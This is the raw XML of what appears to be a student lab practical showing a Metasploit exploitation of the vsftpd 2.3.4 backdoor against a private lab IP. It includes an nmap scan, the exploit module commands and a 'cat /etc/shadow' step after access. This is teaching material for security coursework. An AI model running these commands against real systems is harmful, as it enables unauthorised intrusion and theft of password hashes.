w14:textId="166F20A1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40438FEA" w14:textId="7AF4E32A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1FBBB653" w14:textId="7F4E4F90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A4F371A" w14:textId="4C01E0F2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F1F9188" w14:textId="791F04A4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601F9B2" w14:textId="04D4EDB8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7B06D54" w14:textId="465F2647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4B4C47E3" w14:textId="486E9DFD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6AFDA89" w14:textId="335F9BA1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5E22B81" w14:textId="00ABE0AA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CD68357" w14:textId="2C79998B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50042EE1" w14:textId="4B874F38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20F6FD40" w14:textId="3E5E34ED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315E9EB4" w14:textId="2A66992B" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C05A038" w14:textId="7E9C6A82" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B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6EDB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24D3E3" wp14:editId="42E1B52F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>258233</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6915150" cy="50800"/>
                <wp:effectExtent l="0" t="0" r="19050" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1632450633" name="Straight Connector 1632450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A27B7" id="Straight Connector 1632450633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35pt" to="54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PRACTICAL NO. 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0904E" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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</w:p>
    <w:p w14:paraId="080D0C3B" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6E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F0A084" wp14:editId="154ADCFE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940550" cy="6350"/>
                <wp:effectExtent l="0" t="0" r="31750" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="1632450634" name="Straight Connector 1632450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29CDF" id="Straight Connector 1632450634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pt" to="54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79AEBB4" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="90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EA4B95" w14:paraId="015F57F9" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D51420B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47153D52" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BE92DF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2CC769D6" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14DE3C99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5D4A775A" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79340FAE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6066F3D1" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD19C54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0AD0387A" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A486B2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0FE3EF5E" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711363AE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01616951" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3662A504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79BA616F" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1111FA42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95" w14:paraId="64E2F6E9" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E38D226" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00C8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73344" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E6A3BF" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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6EDB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>STEPS :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2312D6C2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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC22701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06F9F3" w14:textId="24C5A11A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0ABD64BE" wp14:editId="59969995">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7055893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5769610" cy="1905000"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="133350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450644" name="Picture 163245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li_ip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" t="285" r="-166" b="42778"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="576961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305ADD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B20015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D703A68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FADEB36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63C47DA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E0B18E1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2AFEB2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336E28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63C41D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0F2DBD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BC97C1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18F121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8F96F8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BF8AC3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4C2754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AF11C2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2920EA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4F4094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0A6F80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225095F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4A2DB9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463CE4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4C1EDF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DA67DC4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47B1F2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B1490A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1B28B0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3F2687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8C03C4" w14:textId="77777777" w:rsid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2F30B2" w14:textId="74B5D3D2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20384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B91BD17" wp14:editId="1123F247">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1241425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4826000" cy="2483485"/>
            <wp:effectExtent l="76200" t="76200" r="127000" b="126365"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450646" name="Picture 163245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ctim_ip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83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Victim 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ip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msf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192.168.64.132/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B78BFD" w14:textId="09DC5FE8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7ACC91" w14:textId="471B23EE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Sudo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Snamp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Sv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–O –P 192.168.64.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A069876" w14:textId="773E37B3" w:rsidR="00B62845" w:rsidRP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1A89C51C" wp14:editId="79BFFECF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4885690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4522470" cy="2442845"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="128905"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450647" name="Picture 163245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ap_scn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61"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4522470" cy="244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3D324" w14:textId="05684690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Os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details </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597D19E" w14:textId="0CD73E00" w:rsidR="00B62845" w:rsidRP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30C154D7" wp14:editId="387243AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8092668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5652770" cy="1501140"/>
            <wp:effectExtent l="76200" t="76200" r="138430" b="137160"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450648" name="Picture 163245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_detail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150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17904" w14:textId="5C79665F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8592134" w14:textId="4E5BA7CC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D412A22" w14:textId="37FA18D8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097DCAE" w14:textId="2CF9BA42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36B2E8D" w14:textId="41E59005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ED2DD85" w14:textId="1A88F8A8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3B8077F" w14:textId="16044B09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DBF5F14" w14:textId="71AF4EB1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D6AC0A1" w14:textId="336CC2B8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E76EBC6" w14:textId="63401073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BC3FFFE" w14:textId="1940828D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ADD1571" w14:textId="6E8C6F0F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C8D7894" w14:textId="7A578F6B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C25EAEB" w14:textId="25B1F457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6F78592" w14:textId="50CC1551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05AB81E" w14:textId="73561BC1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973B88B" w14:textId="777B8908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944DE42" w14:textId="420F689C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42D1252" w14:textId="3024B1FA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ACC83AA" w14:textId="62E3BAF1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5879381" w14:textId="4D32A18A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A6C17A1" w14:textId="0FD355EE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9944827" w14:textId="08A0DEF5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E9607DE" w14:textId="7CB87F39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CF5BB05" w14:textId="0A149ED6" w:rsid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41E406C" w14:textId="77777777" w:rsidR="00B62845" w:rsidRPr="00B62845" w:rsidRDefault="00B62845" w:rsidP="00B62845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4AC6A3E" w14:textId="2E9A5B32" w:rsidR="00B62845" w:rsidRP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23456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C67BB7C" wp14:editId="64E7A54E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>873457</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5750560" cy="2466975"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="142875"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450649" name="Picture 163245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f_console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1" t="-586" r="499" b="49914"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="575056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4938F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Msf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&gt; use exploit/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unix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>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D8FEA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Msf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&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC6202" w14:textId="055AFA09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6B7D23C0" wp14:editId="000F6208">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4353636</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2225040"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="137160"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450650" name="Picture 163245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it_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Msf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&gt; set RHOST 192.168.64.132(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victim_ip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878AB96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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>thet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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exploit the victim machine using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B708F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Msf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&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9FA56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After exploiting the victim </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gram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go in the victim directory using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F058DA7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Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13184CC3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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26458984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62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gram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–l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B95B07" w14:textId="77777777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07CDA46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9FCE136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4AE2140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C49B11F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45EE3AC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0BE2E6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72734D9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9F0EC2C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D3DDBD6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7D9175C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BC9970A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9BC17C6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5906564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D5C36F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F108837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1F3405C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6C8CC49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4F4E87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7418F0E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5CC7645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2705D44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111DF54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67D5AE3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27C27E2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BAAF67C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E254B57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285509B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82F5F80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67C33C5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BA32010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0EF672F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5D7DD1F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53E0D54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82A122D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C00EC0E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665ACF0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E9DFC68" w14:textId="77777777" w:rsid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5E5FFB8" w14:textId="05A824F2" w:rsidR="00B62845" w:rsidRPr="00B62845" w:rsidRDefault="00B62845" w:rsidP="00B6284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90306D" w14:textId="3C48823C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62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="0D9EA5BC" w14:textId="22B6EEC2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5504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E36EB56" wp14:editId="107BD8A6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-32983</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1883363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4408170" cy="2622550"/>
            <wp:effectExtent l="76200" t="76200" r="125730" b="139700"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450651" name="Picture 163245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loit_victip_msf]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16510"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4408170" cy="262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62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gram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etc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>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C02AA0" w14:textId="4CDC10A9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3029D2" w14:textId="4418FB9B" w:rsidR="00B62845" w:rsidRPr="00B62845" w:rsidRDefault="00B62845" w:rsidP="00B6284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28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6528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74C5CFAE" wp14:editId="50D0D607">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5295265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4128135" cy="3698240"/>
            <wp:effectExtent l="76200" t="76200" r="139065" b="130810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450652" name="Picture 163245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wd_in_victim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698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Check exploited </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>directory’s  and</w:t>
      </w:r>
      <w:proofErr w:type="gram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62845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spellEnd"/>
      <w:r w:rsidRPr="00B62845">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim directories same </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0ECE1A" w14:textId="742CE249" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129F527F" w14:textId="77777777" w:rsidR="00870A01" w:rsidRDefault="00870A01" w:rsidP="00B62845">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1933DC85" w14:textId="77777777" w:rsidR="00870A01" w:rsidRDefault="00870A01" w:rsidP="00B62845">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA43FB5" w14:textId="052C8D42" w:rsidR="00B62845" w:rsidRDefault="00B62845" w:rsidP="00B62845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4832A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONCLUSION :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE5E4A" w14:textId="77777777" w:rsidR="00B62845" w:rsidRPr="00B62845" w:rsidRDefault="00B62845" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B62845" w:rsidRPr="00B62845" w:rsidSect="00C34A61">
      <w:footerReference w:type="default" r:id="rId74"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11910" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1378" w:right="1678" w:bottom="278" w:left="1678" w:header="0" w:footer="9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5392" w14:textId="77777777" w:rsidR="001D6629" w:rsidRDefault="001D6629" w:rsidP="00AE301A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03CEF07C" w14:textId="77777777" w:rsidR="001D6629" w:rsidRDefault="001D6629" w:rsidP="00AE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D897" w14:textId="77777777" w:rsidR="00AE301A" w:rsidRDefault="00AE3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8247" w14:textId="77777777" w:rsidR="001D6629" w:rsidRDefault="001D6629" w:rsidP="00AE301A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63911650" w14:textId="77777777" w:rsidR="001D6629" w:rsidRDefault="001D6629" w:rsidP="00AE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C6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B62A7F4"/>
    <w:lvl w:ilvl="0" w:tplc="D7486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50D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D54159C"/>
    <w:lvl w:ilvl="0" w:tplc="ED5C7D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54DF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="845E69C2"/>
    <w:lvl w:ilvl="0" w:tplc="6EF62FB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7756BF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CCAB58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F06022"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8C83C56"/>
    <w:lvl w:ilvl="0" w:tplc="B9962842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62DBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="213C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6168"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA28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033D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA28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2FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E1A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C52F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A503D9A"/>
    <w:lvl w:ilvl="0" w:tplc="128C0418">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46A9166C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA28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2B4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6E67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2792E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA28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F45AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DA08B52"/>
    <w:lvl w:ilvl="0" w:tplc="D4461262">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;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2F4ADF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CCAB586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882AFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CCAB586"/>
    <w:lvl w:ilvl="0" w:tplc="A0127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4E"/>
    <w:rsid w:val="00036535"/>
    <w:rsid w:val="000E1F33"/>
    <w:rsid w:val="001374F1"/>
    <w:rsid w:val="00184ECE"/>
    <w:rsid w:val="001D6629"/>
    <w:rsid w:val="001F2BA2"/>
    <w:rsid w:val="0020014D"/>
    <w:rsid w:val="002163EE"/>
    <w:rsid w:val="002228B1"/>
    <w:rsid w:val="002A5719"/>
    <w:rsid w:val="002E696A"/>
    <w:rsid w:val="0044408E"/>
    <w:rsid w:val="004661EF"/>
    <w:rsid w:val="004832A2"/>
    <w:rsid w:val="00577337"/>
    <w:rsid w:val="005824E8"/>
    <w:rsid w:val="005A7074"/>
    <w:rsid w:val="005C105D"/>
    <w:rsid w:val="005E6C75"/>
    <w:rsid w:val="00663624"/>
    <w:rsid w:val="0069574B"/>
    <w:rsid w:val="006E2B58"/>
    <w:rsid w:val="006E6C94"/>
    <w:rsid w:val="006F7B7D"/>
    <w:rsid w:val="00727277"/>
    <w:rsid w:val="00870A01"/>
    <w:rsid w:val="008D7A74"/>
    <w:rsid w:val="0093196F"/>
    <w:rsid w:val="0094614E"/>
    <w:rsid w:val="0095479E"/>
    <w:rsid w:val="009E462B"/>
    <w:rsid w:val="00A5146C"/>
    <w:rsid w:val="00AA4C12"/>
    <w:rsid w:val="00AA5576"/>
    <w:rsid w:val="00AB66A5"/>
    <w:rsid w:val="00AE301A"/>
    <w:rsid w:val="00B62845"/>
    <w:rsid w:val="00C04558"/>
    <w:rsid w:val="00C34A61"/>
    <w:rsid w:val="00E26B7D"/>
    <w:rsid w:val="00E52411"/>
    <w:rsid w:val="00EA4B95"/>
    <w:rsid w:val="00EB138F"/>
    <w:rsid w:val="00EC2D41"/>
    <w:rsid w:val="00F1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E269"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F07BE98B-FC17-4DD7-86E8-9A9B4820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45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14E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00EC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A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E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A"/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82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824E8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6063-1E7F-4124-803E-89499E98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9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Ziaulhaq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lab201</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-19T13:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-01T03:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>